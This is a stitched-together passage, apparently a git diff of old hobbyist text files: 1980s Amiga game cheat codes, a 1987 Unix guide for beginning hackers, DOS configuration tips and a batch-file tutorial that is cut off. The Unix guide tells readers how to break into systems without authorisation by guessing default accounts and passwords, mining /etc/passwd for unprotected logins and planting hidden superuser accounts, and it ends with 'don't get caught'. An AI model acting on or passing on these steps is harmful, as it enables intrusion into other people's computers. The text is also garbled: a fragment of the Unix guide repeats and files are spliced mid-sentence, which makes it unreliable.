backdoor.txt + +February 20 1989 + + +This is BACKDOR1.arc ... the first in a series of +"back doors" to various games. The source of this info is +various magazines, and I have paraphrased the articles. + +Note that "back door" refers NOT to regular game hints on +how to play better, but to a way to CHEAT, usually put +there by the programmer, sometimes caused by a bug. Usually +you'll be made invincible if it's an arcade-type game, or +be able to advance quicker if an adventure game. + +Most of these "back door" and "side door" hints are out of +a GREAT magazine for the Amiga, C64, and C128: INFO. +It's a grass-roots, down to earth magazine - the first +magazine about personal computers to be be entirely done on +personal computers. That's "Where It's At". + +You owe it to yourself to subscribe to INFO. +With the exception of most of the ads, everything including +color screen shots and photos are digitally created, edited, +composed, printed, and color separated as complete assembled +pages on 14 Amiga computers running Professional Page (and +many many other Amiga software products), and output to a +Linotronic L300 typesetting device at 1235 dots per inch! +INFO doesn't cover programming techniques, but in my opinion +it out-shines all the other Commodore mags for news, honest +opinion, game reviews, and reviews of all C= software. + +George Knochel, Lakewood Colorado + + + +ALL GAMES: connect a genlock to the Amiga and leave it on +while playing games, and they'll play 25% slower, which +allows you to score high. + + + +ARKANOID + +Get into the back door this way: boot and run the game as +usual, then select a start screen and begin game. Press the +space bar to pause, and type in DSIMAGIC (no spaces, and +don't press Return). Press the space bar to unpause. + +Now a yellow Power capsule named DS will fall down. Catch +it. Now you can get any power capsule you want any time. +Press the first letter of the capsule you want, and it will +fall down for you to catch: + Break Catch Disruption Expand Laser Player Slow +Catch some Player capsules first to get extra lives. + +You can also use two capsules at the same time, like Disrupt +the ball into three balls, and use Lasers also. + +Pressing the F key will send you to the Finsl screen where +you fight DOH, the Dominion Over Hour monster on the cover + of the package. You'll need lots of lives first. + +Skip over any screen by pressing Enter on the keypad, or +get through the screen fast (with points too) using a Break +capsule. + + + +ARKANOID II + +On the high score screen, type in the name DEBBIE S +(with the space), and you'll have infinite lives. + + + +BARBARIAN + +Boot and run the game as usual, but at some point after the +game has started, type in: 04-08-59 ...It will make the +Barbarian character almost invincible, but he can still be +killed by very high falls, and by the flame-hurling horned +demon in the dungeon deep, pictured on the cover. + +After you type 04-08-59 the screen will turn gray, telling +you that you're invincible. + +Once you make it to Necron, you must have a shield. Face +Necron when he turns to face you. When he throws a fireball +at you, press the defense button as it hits your shield. + + + +BARD'S TALE + +How to hoard millions in gold without trying: Load your +party, go to the stats screen for the first player. Pool +all of the party's gold to the first player, then remove +him from the party, then load him back in. Then pool the +gold to another player. Repeat this for each player. + +Then turn off the computer without saving the game. Reboot +and ezch player will have gold equal to the TOTAL the party +had before. Repeat if you're really greedy ! + + + +BETTER DEAD THAN ALIEN + +If you are just about to be hit by an alien or a bomb, press +the ESC key to pause, move your ship out of the way, then +press N to resume the action. + +Type CHAMP on the options screen, then press the HELP +key. You'll be shown a list of cheat keys. + + + +CAPONE + +To find the "special bonus", go to the front of the Post +Office. Shoot the ball at the top of the flag pole, and +your score will go way up. If you shoot it again, you'll +see a screen of the programmers! Shoot again and you'll be +invincible, standing in the bank. At the end of that round, +you will start at the beginning, except you'll be in warp +speed. + + + +DEFENDER OF THE CROWN + +To get 1,024 Knights: After conquering a territory, press +these four keys at the same time, while the drive is still +running: H J K L ... If you do it just right, you'll have +1,024 knights both in your home and in your army. Hey, this +is good stuff! + +Another way was reported in which to get 1,024 Knights, but +it doesn't seem to work: After first picking the knight, +when Robin Hood appears, type PATTERSON over and over until +the map of England appears. Don't press the Return key. +If this trick doesn't work the first time, try again. +I was only able to get this to work most of the time if, +before typing PATTERSON over and over, I first typed in +my name with no spaces: GEORGEKNOCHEL Yep, Twilight Zone! + +Another good trick for Defender of the Crown, for sword +fighting, is to get the PD program called FUN-BUT +(fun button), which when run lets you press the F1 key +continuously instead of clicking on the mouse. +(but then this is a hint, not a back door). + + + +DRAGON'S LAIR + +This will demo the ENTIRE game (about 18 minutes worth or a +disk I/O error, whichever comes first). You can't play it, +just watch the whole game: After the credits have finished +loading, and are being displayed (the red light will still +be on, but no loading is occurring), press the following six +(6) keys, simultaneously: R / L N 7 +Yes, all at the same time (use your nose if ya have to - +just press ESC and hold, then press R and hold, etc.). +The screen will flash if you did it right. THEN PRESS THE +FIRE BUTTON on your joystick. Sit back and watch all the +animation. (I couldn't - my disk 5 had an I/O error) + + + +DUNGEON MASTER + +To advance Ninjas a level, stand in a hall and throw all +your weapons, then get them and repeat. This also works +with magic and Fighter levels: cast a spell at the air, +or slash and bash until you gain a level. + + + +F/A-18 INTERCEPTOR + +Select option "2 Free Flight, no enemy confrontation" from +the main menu. Then select zero instead of 1 to 4. The +screen will go into a spiral and scroll way south to 34 by +117 degrees, placing your plane somewhere without a runway. +To take off you have to use the afterburners. 117 degrees +is the furthest south you'll be able to fly, but you can go +in other directions. (Is there more to this back door? hmm) + + + +FAERY TALE ADVENTURE + +Sometimes you can accumulate all the treasure you want by +going near the item, press space bar, and keep pressing 'T'. +You'll receive an infinite supply of that treasure. + +Save your position in a dungeon. Then go through it until +you don't have anymore keys. Restore your position. All +doors already opened will still be open, and you'll have a +new supply of keys. Repeat if needed. Also works in cave. + +Jump on the turtle and start slashing. Your bravery points +will go up to infinity, but doesn't hurt the turtle or you. + +On the island with the Crystal Castle, press the right mouse +button while talking to the Sorceress and your luck will go +to 65. "Ask"ing the Sorceress several times will normally +boost your luck. + +If running low on green keys, use a secret entrance for the +fort - it is on the left side, almost even with the door. + + +HYBRIS + +Boot game and don't do anything until the high scores screen +appears. Then type COMMANDER and click the fire button. +When it starts, wait a few moments and press the F10 key. +If the extensions of your ship get flickery or glimmer, +you're now invincible and have unlimited expansions and +smart bombs. Get to the other 6 levels of expansions by +pressing F1 through F5 when you're in unexpanded mode, or +capture the special "capsules" in the usual way. Move to +other game levels (there are three) with the F8 key, and +turn invincibility off or on with the F10 key. No High +scores are collected when you're invincible. + + + +KARATE KID II + +Press the P key in single player mode to be taken to the +next screen. You can go as far as the Final Encounter. In +2-player mode, you can go to the next-to-the-last screen. + + + +LEISURE SUIT LARRY + +Press ALT and X at the same time to bypass the proof-of-age +questions. + + + +STARGLIDER (not Starglider II): + +Boot and play as usual until launched and ready to do +battle. Then slow down until completely stopped in +space. Press the F1 key to turn on the fixed sight, and +press the backspace key to pause the game. Now type: + js[space]arg[space]s You should now be invincible! +You'll know you're in invincible mode when you can +repeatedly press the P key and get additional missiles (up +to 9). If the password didn't take the first time, try +again. To may have to dock and re-exit for it to work. +Once invincible, your fuel will remain constant and shields +will never be depleted. + +Also, a secret built-in 3D object viewer running in the +background is available by pressing the z key once you've +entered the invincible mode. Use the keyboard to pause [p], +select [, and .] and manipulate objects - use all keys +except q and ESC. Use the mouse to change point of view +and magnification and hold down the right button. .... + + + +STARGLIDER II + +Once the game has started, press F for fixed sights and +then slow the ship to a halt. Press BACKSPACE to pause, and +type the words: WERE ON A MISSION FROM GOD (really!) +(The article did not have the apostrophe ' in We're ...) + +Then press 1 (one) on the keyboard (not keypad). Your +shield and energy levels will drop to a fixed point. Press +the letter K to get all the weapons in the game, including +the neutron bomb. If you run low on weapons, you can get +them all back by repeating the process. Onward into battle, +young soldiers! + + + +SWORD OF SODAN + +Type NANCY then press RETURN on the high scores screen for +unlimited lives! + + + +TEST DRIVE + +Holding down the joystick button while going around curves +prevents you from hitting the wall or going off the cliff. + + + +THREE STOOGES + +To really slow down "the hand" which selects the scenes, do +the slapping game and pull Curly's ear: pull it continuously +until the time runs out. + + + +XENON + +Let yourself be killed off at the beginning of the 2nd stage +of the 2nd level, and all aliens in the round are destroyed. + + + +Press [ENTER] to continue... + +Call the Terminal Bliss BBS at T-ERM-INA-LBLS. + + \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ + \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ + \\ home of the dead rock \\ + \\ stars and across the \\ + \\ street from the circle \\ + \\ A its the............ \\ + \\ \\ + \\ DEAD ROCK CAFE \\ + \\ 415-676-5953 \\ + \\ 300-1200-2400 BAUD \\ + \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ + 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b/textfiles.com/computers/basunix.hac @@ -0,0 +1,351 @@ + ******************** + Basic Unix Use + By Lord Lawless + Phortune 500 + Board of Directors + ******************** +March 8, 1987 +------------- + +This file is basically a brief introduction and overview for the beginning +hacker to the Unix operating system. All information contained herein is +accurate to the extent of my knowledge. This file is intended for inform- +ational purposes only and the author (Lord Lawless) is in NO way responsible +for the use of this file for purposes other than the aforementioned. + +Part I: What is Unix? +---------------------- + Unix is an operating system, so designated because it allows a user to +interface with a computer in a way that is (hopefully) easy for the user to +learn and use. Unix can be known by other forms, PC-Unix, Xenix, etc., but +they all basically are the same (with slight differences this file won't go +into) and use the same commands. Unix is a wonderfully simple to use OS once +you begin, and while this file will help you I recommend that you find a Unix +system somewhere and wander around on it to help yourself to learn. To put +this more formally: + +The UNIX system is a set of programs that include a time-sharing +operating system and a set of utility programs. The operating +system has two basic parts: + + 1) The kernel is the program in the UNIX operating system + that is responsible for most operating system functions. It + schedules and manages all the work done by the computer and + maintains the file system. It is always running, and is + invisible to users. + + 2) The shell is the UNIX operating system program responsible + for handling all interaction between users and the computer. + It includes a powerful command language called "shell language"*. + +The utility programs (usually called UNIX commands) are executed +through the shell, and allow users to communicate with each other, +to edit and manipulate files, to write and execute programs in +several programming languages, and many other things. + + +Part II: Recognizing a Unix system +------------------------------------- + When you connect to a Unix system you will see a message usually like +"AT&T Unix: Unauthorized use will be Prosecuted!" or just "Unix System V" or +the like. At the least you will see a prompt saying "login:". At this point, +if possible, make sure that you are in lowercase, because if the computer det- +ects that you are typing in uppercase everything you read after will be in +uppercase with lowercase denoted by a \ in front of the word. This is because +Unix is case sensitive, so be careful, reading lowercase is much easier than +reading all uppercase and slashes. Ok, so here you are at the Unix "login:" +prompt. + +Part III: Logging on +--------------------- + At this point you must enter your login, and then, if the account ( +never more than 14 characters) has one, the password. Now, all Unix systems +have default accounts, and unless set by the Root System Operator no passwords. +This has been the means of infiltration by many the Unix hacker. There are two +types of accounts in a Unix, the "super user" and the "user". The super user +has access to almost everything (or everything depending on the system) and the +user basically has access to the files he owns and what he can sometimes read. +The default super user accounts on a unix are: + +ROOT +MAKEFSYS +MOUNTFSYS +UMOUNTFSYS +CHECKFSYS +and sometimes +ADMIN +SYSADMIN. + +For passwords to these try things like SYSTEM, SYSMAN, SYSADMIN, ADMINISTRATOR, +OPERATOR, SYSOP, etc. +The default user-level accounts are: +LP +DAEMON +TROUBLE +NUUCP +UUCP +RJE +ADM +SYSADM +SYNC +BIN + +(Note: These accounts should be entered in lower case , I merely wrote them +in upper case for easier reference.) +After being on Unix's, I have also seen the following common accounts: +USER +UNIX +GAMES +GUEST +STUDENT -on school run Unix's. + +The maximum length of a password is 11 characters. +After doing all this you should, with luck, be in! +If you couldn't hack anything out, try typing "WHO" at the login: prompt, it +may list all the user accounts and you can try them until you find one without +a password. + +Part IV: You're in!!! +---------------------- + Congratulate yourself, the hardest part of Unix "hacking" is over. Ok, +now that you're in you'll see a prompt which will probably look like "$" for a +user account or "#" if you got lucky and got a super user account. +(Quick note, to stop a unix process in action try typing ctrl-d or control +backspace, these are the end of file/Stop process keys.) +Ok, so you are now in. Let me give a quick lesson on Unix directories. In +Unix, the root is the main directory, and it contains subdirectories which may +contain subdirectories etc. In order to change to the root directory, one +would type "cd /". This is because "cd" is the command "change directory" and +"/" is the root directory. To change to subdirectory "Bill" contained in the +root directory, you would type "cd /Bill" or, if you were in the root dir, just +"cd Bill". If you wanted to access Bill's files, you'd enter "cd /Bill/files" +assuming Bill had a subdir called files where he kept his files. This is how +a person would move around in a Unix sys. Graphically, it looks like this: + + Root + __________!!_________ + !! + __Bill__ + !! + __Files__ + + +Part V: Basic Commands +----------------------- + Ok, these commands are the most useful ones that I've found and can are +entered from the prompt. + +Command:What it does +-------------------- +ls gives a listing of all files in a directory + +cat gives a dump to screen of what is contained in a file. For instance + "cat phones" would show me what is in file "phones". + +cd change directory + +pwd shows what directory path you are in now + +ps shows system processes + +rm remove a file, for instance "rm phones". + +rmdir removes a directory, for instance "rm Bill". + +grep print ascii strings in a file, ie "grep phones" + +who shows who's on the system + +mail sends mail to a user, syntax mail + +su change from 1 account to another. For instance, if you are account + Bill and wish to change to account Jake (which is unpassworded) just + type "su Jake" and you will change to him. If Jake has a password you + will be prompted to enter it. This is useful for loggin in under a + user account and switching later to a super user account. + +passwd allows a user to change his password. If you are a superuser you can + change someone elses password by typing "passwd ". + +mkuser make a user (providing you are a super user) + +mkdir create a directory + +More Information about Commands +------------------------------- +The following are more of the most basic Unix commands. + +cat cd chmod cp cut date +echo egrep fgrep file find glossary +grep help ln locate ls mail +mesg mkdir mv news pr ps +pwd rm sleep sort starter stty +tabs tail tee time touch tty +uname usage wall wc who write + +Using the Command: mkdir + +Syntax Summary: mkdir dir_name1 [ dir_name2 ...] + where: + dir_names are simple subdirectory names, + relative pathnames, or full pathnames + +Description: + mkdir creates one or more new directories. + If mkdir is given a simple name as an argument, the new + directory will be a subdirectory of the current directory. + You can make new directories anywhere in the file system + by giving mkdir a complete or relative pathname for the new + directories, if you have permission to write in the directory + where the new directory is to be created. + +Ok, those are the basic commands you will need to go around in the system. + +Part VI: Useful Information +---------------------------- + A great place to go to get information on who is on the system and +what accounts you can use to get on again is contained in the file "passwd" +in the "etc" directory. To look at it, cd etc, and then cat passwd. The +first entry should say something like this: +root:adfaBADca:0:1:Operator:/:/bin/sh +what this means is that the root account has an encrypted password, has super- +user capabilities (any user with a 0 in that slot is a super user) is in group +1 (relatively unimportant for this file), has a comment of Operator (this may +be blank), has a home directory of / (the root) and uses the Bourne Shell, kept +in the /bin directory. +You will then see all the other users listed out in the same format. If you +see an account followed by two colons, that means that it has no password. You +want these accounts so that you can log in under them another time. If you get +real lucky you may see something like this: +makefsys::0:1:/bin:/bin/sh +meaning that you have found a super user account with no password, a very +useful item indeed. + +Another good place to look is the /usr/spool dir and the +/usr/spool/cron/crontabs dir because if you are a super user that dir contains +much that will be useful to you. + +In order to move up to a directory one level higher than you are presently in, +type "cd ..". So to move from /Bill/files to /Bill I would just type cd .. +and, assuming I started in /Bill/files I would now be in /Bill. + +Ok, now you can wander the system "cat"'ing around and whatnot. If a file +doesn't "cat", try just typing it's name, that will execute it if you have the +privileges. Try typing "admin" or "ua" if you are a superuser nad maybe you'll +be able to create users or other interesting things. You may not be able to +cat a file or run it because you lack access permissions. What are they? Read +on! + +Access Permissions +------------------ + access permissions: permissions: mode: owner: +owner/group/others: read/write/execute + +As the user of a UNIX system, you can decide who can read, write, +and execute the files and directories that you own. You are +usually the owner of files and directories that you have created in +your login directory and in the "subdirectories"* in your login +directory. You may also own files in other peoples' directories. +You control the use of your files and directories by specifying the +access permissions, also called the mode, for each. You can specify +different access permissions for yourself, your "group"*, and the +other users of the system. Permission to read allows the user to +read the contents of the file. Write permission allows the user to +change the file and execute permission enables the user to execute +the program within the file. + + ls -l + +prints the access permissions for each file and directory in the +current directory. The sample listing below shows the mode of the +file (preceded by a -), the number of "links"*, the owner, the +"group ID"*, the size in characters, the date and time the file +was last modified, and the "filename"*. + + -rwxr-x--x 1 sandy 12345 128 Oct 9 9:32 lock + +If this were a listing for a directory, the hyphen (-) would be +replaced by the letter d. The owner of the file "lock" can read, +write and execute the file, the group can read and execute it, and +the others can only execute it. You can change the mode of your +files and directories by using the change mode command, chmod. + +Other interesting places to look are in the directories assigned to the users +on the Unix system, often their files will contain some useful information. +Also try going into the /uucp directory or looking for any uucp dir anywhere as +it may contain phone numbers to other Unix systems or other "goodies". + + +The *: asterisk +--------------- +In the shell, an asterisk matches any "string"* of characters in +a "filename"* on a command line. The command + + rm temp* + +removes all files from the current working directory that begin with +the string "temp". Files like "temp", "temp1", "temp.1", and +"temp.save" would all be deleted. An asterisk alone matches any +filename in the current working directory except those beginning +with "dot (.)"*. For example, + + rm * + +removes all the files in your directory except for the dot (.)files. + +Finally, typing help at the unix prompt may bring up a help manual that is +usually quite well done and will help you if you are stuck or wish to explore +in more depth the commands I didn't go into. + +Hmm, what else? I can't think of much more right now that would help you much +more, in this file I think I've covered everything that should get you well on +your way towards becoming a unix hacker. Once you've got this, start reading +files on "Unix Shells", "Scripts", and ask around A LOT. Ah, I just remembered +something. To get help on a command, type "man " or "whatis +" and you may find out. Also, a lot of Unix's have a built in Help feature +somewhere, try to get to it. + +Part VII: A Few Final Words +---------------------------- + If you manage to get onto a Unix system, don't screw it up. Unix is a +great operating system, and fun to learn on and have other people learn on. +Don't become a superuser and delete everything or other things, it's just not +worth it. Also, don't make a use called "Hacker" or "Shadow 1" or something, +that's a blatant giveaway. Put an account a little out of the way directory, +and create user level accounts if you must, and perhaps just 1 super user +level. I can't think of much more to say on the basics, though I probably left +some important things out....nobody's perfect. I hope you enjoyed the file and +I can be found on the following boards: + +The Private Connection +The Undergraduates Lounge +Quick Shop +Phreak Klass 2600 +The Brewery +The Works +Slaughterhouse 5, Holovision Network Node 1 +Spock's Brain + +Special Thanks to: The Prophet, for his excellent file: Unix Use and Security +From the Ground Up. + +The End, good luck, enjoy yourself, and don't get caught! + + Lord Lawless + Phortune 500/BOD + + --This has been a Lord Lawless Presentation, (C) 1987.-- + + +u are a super user that dir contains +much that will be useful to you. + +In order to move up to a directory one level higher than you are presently in, +type "cd ..". So to move from /Bill/files to /Bill I would just type cd .. +and, assuming I started in /Bill/files I would now be in /Bill. + +Ok, now you can wander the system "cat"'ing around and whatnot. If a file +doesn't "cat", try just typing it's name, that will execute it if you have the +privileges. Try typing "admin" or "ua" if you are a superuser nad maybe you'll +be able to create users or other interesting things. You may not be able to +cat a file or run it because you lack access permissions. What are they? Re \ No newline at end of file diff --git a/textfiles.com/computers/bat&conf.txt b/textfiles.com/computers/bat&conf.txt new file mode 100644 index 00000000..f4712f64 --- /dev/null +++ b/textfiles.com/computers/bat&conf.txt @@ -0,0 +1,206 @@ +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +Always start a program with a batch file containing [exit] as the first line. +This is important if you! Let's say you already have shelled to dos from +windows, dmp or another program. Running two big shells on top of eachother +really fuck up your memory, and usually requires a reboot. Replace win.exe +with win.bat and move win.com to winfile.com, and dmp.exe with play.bat and +dmpfile.exe, just as an example.... | The bat files is to contain lines: +1 - exit 2-[program].[extension] + +------------------------------------------------------------------------------- + +If you have 4dos, you can create aliases that replace the programs. Like: + +win=exit^win + +, etc....... + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +Your path statement should NOT exceed 127 bytes. Remember that "path=" +is a part of that environment string. + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +If you ever need to turn a variable to UPPER CASE, save the path, set the +path=[the variable], which will make it uppercase, set the original +variable=[path], and restore the path... This might look like this: + +set oldpath=%path% +set path=%a% +set %a=%path% +set path=oldpath + +This requires a lot of environment free, depending on you system-configuration. + +Suggestions to improvements: Use disk instead of environment to store +temporary data. + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +A very simple trick to expand the current path, is to set the path like this: + +set path=%path%;[the new directory you want temporarily in your path] + +Don't say you wasn't warned! VERY simple! + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +if you like to have a lot of REM statements in your batch files, use this +instead: + +When you normally- + + rem blahblahblahblablahblahblah + rem blahblahblahblablahblahblah + rem blahblahblahblablahblahblah + rem blahblahblahblablahblahblah + +replace it with, + + goto a + rem blahblah........ + :a + +Which is faster, but not really noticeable on todays fast computers +Dos really don't know that it's handling a REM line until it has processed +and read the whole line! + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +To prevent programs from messing up your autoexec.bat, as a first and only +line in autoexec.bat, start a new batch file, called, for example, +autosub.bat. This file would contain your originally autoexec.bat, and +this way, you can select what lines you want to include. + +You might also try to set the read only attribute of the config.sys and +autoexec.bat files. Not so good solution, but......? + +------------------------------------------------------------------------------- + +With 4dos you would start the autosub.bat with a CALL autosub.bat. +With command.com, i dunno, try c:\autosub.bat as a first line... + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +again, a tip for slow computer, or really, slow text subsystems: +In the beginning of your config.sys, put a: + +ctty nul + +which sends all output to the NUL: device +and then in the end: + +ctty con + +which restores input from the kbd.... + +Remember that you can't really press ctrl-break during process +since you haven't restored the keyb-control, and a ctrl+c will stop +processing and deny any further processing... + +The NUL device is an empty device that points to nothing. This might be useful +if a program refuses to let you NOT save a file. Type NUL: or NUL as filename, +and you will never see the file again! + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +There is an undocumented config.sys feature called "Comment". +Use it like this: + +Comment=[text] + +Dos only captures the first to letters of the text, and COMMENT is not +case-sensitive. After comment, dos ignores all lines that begins with +the same two letters as the first two letters of [text] was. Let's say you +don't want any drivers installed, you specify: + +Comment=De + +,which in turn makes dos NOT install any DEvices. + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +I found two other undocumented config.sys features. One of which I know the +meaning of. (See it for yourself, just list io.sys.) The features is: + +INSTALLHIGH +MULTITRACK + +Installhigh is like devicehigh and loadhigh, but it INSTALLs high, just like +dvh and lh. (Installing is for starting exe/com files from config.sys that +are not really needed for installing here...) + +Multitrack... +I dunno what this is, but I will investigate it further, and get back to you. +If you know what this is, please contact me. + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +Sometimes the order of fcbs, stacks, files, etc... DO COUNT!!! + +You might run into some RARE problems when the order of these +"names" is in a certain order. It occoured to me that it was this way, when I +suddenly had problems when the machine locked up whenever I used the internal +"copy" !!! I had to rem out every line in autoexec.bat (really autosub.bat), +and then every line in config.sys, until I suddenly found out that the +order DO COUNT! + +Generally, I put it in this order (at the absolute beginning of config.sys): + +files +buffers +fcbs +lastdrive +stacks + +That works ok for me. + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +Set verify=on when using non-standard devices in dos. +This helps you PKUNZIP (and arj, lha...) and copy from, for example, +84track 21sec/track disks. You might think that this isn't a problem, and +it is very rare indeed... ,But it happens, and the extra time dos uses with +disk sector verifying is really worth it. + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +Set break=on to be able to break more often. + +Everyone needs a break sometimes....... =*) + +The extra speed gained in dos by setting break=off, isn't THAT much, and +when you set break=on, you can break unwanted processes faster, which makes +dos sessions go faster. + +Have you ever COPYed files to the wrong destination? When break=on, dos checks +for ctrl+c even when handling disk operations, so you can break relatively +fast, and recover faster... + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +Do you need to know if to files is different? +As far as I know, fc or comp don't leave errorlevels, BUT there is a +solution! + +Try this: + +attrib -rsh .\nomatch +del .\nomatch +fc %file1% %file2% > .\nomatch +if exist .\nomatch echo There was a difference! + +Nice, eh? Not? =*) + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð + +Want to copy disks faster? You COULD check which clusters were occupied, etc.. +BUT if you aren't so keen on writing anything else than bat-files, just copy +ALL files on you floppy (/S /H) to a temporary directory on your hd, copy +labels (with LC.btm). Then MOVE them out again to disk, and you are done! + +No empty clusters copyed! + +ððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððððð diff --git a/textfiles.com/computers/batch.txt b/textfiles.com/computers/batch.txt new file mode 100644 index 00000000..5070bd43 --- /dev/null +++ b/textfiles.com/computers/batch.txt @@ -0,0 +1,1047 @@ + + ---------------------------------------------------------------- + + BATCH FILES FOR EFFICIENCY - GETTING REAL WORK DONE + + ---------------------------------------------------------------- + + Batch files are one of the hidden treasures within your + computer. Let's face it, learning and using DOS commands is a + test of patience, memory and stamina. Batch files are the secret + weapon which can boost your computer into the fast lane of work + productivity. + + Batch files are small software programs which you can prepare in + the space of only five or ten minutes which automate a variety + of tasks and customize the computer to your work style. The + bottom line is that batch files can preserve your sanity in the + face of arcane, easily-forgotten DOS commands to provide you + with a menu system for your hard drive, transfer and backup + files, provide security, start other software programs, activate + your printer and much more. + + Amazingly, batch files require that you become familiar with + only eight commands in addition to the normal DOS commands. + Working with batch files means you are programming in the most + literal sense - let's take a tour of the small miracles called + batch files . . . + + A batch file is little more than a list of DOS commands plus + eight special batch commands. These commands are stored on your + floppy or hard disk in an ordinary text file such as produced by + your word processor or text editor. If you can type a letter to + a friend, you can prepare a batch file! + + Several time-saving batch file examples which provide real work + power to your everyday computer problems are presented at the + end of this tutorial. We will also examine the eight basic batch + file commands as well as the AUTOEXEC.BAT file which starts your + computer each morning. In addition we will present some simple + tricks for managing your printer with batch files. + + One way to think about a batch file is that it takes the + place of your keyboard and issues commands one after another + until it reaches a conclusion. Batch files operate line by line + and are read directly from the disk which makes them a little + slow, but nevertheless useful and flexible. You can eliminate + repetitious keyboard tasks by using batch files. Let's look at a + short batch file . . . + + Each line of a batch file contains one instruction or operation + per line which the computer is to perform. Below is the listing + of a simple batch file example. Don't worry about understanding + it yet, simply note that each instruction is a DOS command on a + separate line. The list in the left column is the actual batch + file, while the explanation in the right column is NOT part of + the batch file, only a helpful column of comments. + + EXAMPLE BATCH FILE EXPLANATION + | | + date date displayed + time time displayed + ver DOS version displayed + dir a:/p directory of a: floppy + displayed with a pause + + The primary use of batch files is to automate sequences or + instructions which you use frequently. A batch file always has + the extension BAT. A batch file might for instance be named + MENU.BAT, CAR.BAT, INSTALL.BAT or MONEY.BAT. + + Each line in a batch file is a separate command and is performed + in sequence as if you had typed in the command from your + keyboard at the DOS prompt. In addition to the usual DOS + commands, batch files can also contain additional special + commands to provide truly sophisticated program structures which + include decision branching and even repetitions of commands. + In addition, batch files may have special parameters or inputs + passed to them at the time you run the batch file from the DOS + command line or prompt. + + A batch file is run or started by typing the file name without + the extension. This of course also applies to files ending with + file extensions EXE or COM as well as BAT. + + Example: A>hello (Then pressing enter or return key) + This starts the file hello.bat hello.com or hello.exe + + Example: C>whoops (Then pressing enter or return key) + This starts the file whoops.exe whoops.bat or whoops.com + + There are several ways to abort or terminate any batch file in + progress. 1) Issue the break command which uses the two key + combination CONTROL-BREAK (hold down the control or CTRL key + then press the break key) or you can 2) Tap CTRL-SCROLL LOCK + keys or 3) Tap CTRL-C keys. + + There are many ways to prepare a batch file, all of which use + simple methods of text editing or word processing: 1) Use the + DOS COPY CON (copy console) command. 2) Use the older EDLIN line + editor available within DOS. 3) Use the newer DOS EDIT text + editor available in DOS version 5.0 4) Use any word processor + (e.g., Microsoft Word, Wordperfect, PC-Write) whose output has + been set to ASCII or pure text output - many word processors use + a "save as" file option to select pure ASCII output. See your + word processor reference book index under ASCII file saving. + + Let's prepare a batch file: + + First make sure you have a formatted disk in your disk drive and + DOS is displaying a DOS prompt such as A> or C>. We need a disk + in order to save our batch file. + + We will be using the command COPY CON (copy data from the + CONsole) command. We could also use any ASCII (plain english) + text word processor (e.g., Wordperfect) or even EDLIN on your + DOS disk. Note that you can use either upper or lower case to + prepare batch files (capitals or small letters.) Using COPY CON + is like using a small typewriter to prepare your batch file. + + Type the following list carefully at the DOS prompt: + + copy con blink.bat (press enter - cursor skips to new line) + echo Hello there (press enter) + ver (press enter) + date (press enter) + dir/p (press enter) + ^Z (press F6 OR your can press control key + AND Z key, then press enter) + + When done, you'll have prepared a batch file of DOS commands + named blink.bat. Run the batch file by typing this at the DOS + prompt: + blink (then press enter key) + + WARNING! Be careful when preparing batch files since you will + automatically overwrite and destroy any PREXISTING batch files + of the same name! Better to make a backup copy of the existing + batch file (or rename it temporarily with the REN command) and + then proceed. A classic beginner mistake is to tinker with the + crucial AUTOEXEC.BAT file without saving a backup copy first! + More about AUTOEXEC.BAT later in this tutorial. + + We could also have named the batch file above hello.bat or + info.bat rather than blink.bat by changing the first line we + typed, but for simplicity we'll stick with blink.bat which does + the following chores: Print "hello there" on the screen, then + type the DOS version in use then display date and finally + produce a directory listing with pause after each screenful. At + this point the batch file ends and returns you to DOS. In the + first line we use COPY CON as our small word processor to begin + construction of the batch file named blink.bat. In the last line + the ^Z means end of batch file preparation - exit back to DOS + and save the file on disk. + + Another example batch file for you to try, let's call it F.BAT + This is a reminder that F.BAT refers to formatting a disk: + + echo off + copy con f.bat + cls + pause + format b: + echo all done + + Notice that here I have omitted the COPY CON command to start + file preparation and the F6 to end file preparation. Use the + COPY CON method described above if you wish or whatever word + processing software is available to construct the file. + + This batch file (activated by typing f then enter) will clear + the screen then prepare to format a blank disk in b: drive. + NOTE: you MUST have FORMAT.COM, the DOS formatting utility, on + the same disk as the batch file, f.bat - remember that format is + an EXTERNAL command and f.bat will try to find FORMAT.COM. + + After the batch file has formatted the disk it prints "all done" + on the screen. So instead of LOTS of keystrokes to format a + disk, you just tap "F" then hit enter and the batch file runs. + See how we are saving keystrokes - that's one of the purposes of + a batch file! We will discuss the new ECHO command a little + later in this tutorial. + + A reminder: Ctrl-Break or Ctrl-C key combination will halt + any batch file operation if you wish. + + The next batch file might be used to backup word processing data + files from your hard drive onto a floppy disk. Let's make an + initial assumption that your word processing documents are + stored on your hard drive in the subdirectory C:\DOC. You could + name this backup batch file B.BAT and when you need to backup + simply type B (then press enter) at the DOS prompt. We've + omitted the copy con command at the top of the file and the ^Z + at the end of the file since you already know how to start and + end a batch file from previous examples. Note the new commands + we are using: REM, ECHO and PAUSE which we will discuss shortly. + + ECHO OFF + ECHO This batch file backs up DOCUMENT files to disk B: + ECHO READY TO BACKUP. + PAUSE + COPY C:\DOC\*.* B: + ECHO All done! + + The line which does most of the work is COPY C:\DOC\*.* B: + which translates as "copy all files from C:\DOC subdirectory + and transfer them to B: drive." + + One batch file can start or call another, but the original batch + file cannot usually be returned to - you must 